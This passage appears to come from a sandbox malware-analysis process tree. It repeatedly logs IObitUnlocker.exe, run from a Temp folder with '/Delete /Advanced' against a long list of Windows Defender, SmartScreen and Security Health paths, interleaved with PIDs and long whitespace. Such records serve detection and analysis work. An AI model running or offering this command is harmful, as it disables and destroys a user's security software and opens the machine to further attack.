Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:9504
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10204
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:10172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:10096
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9232
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9568
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10176
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:9536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 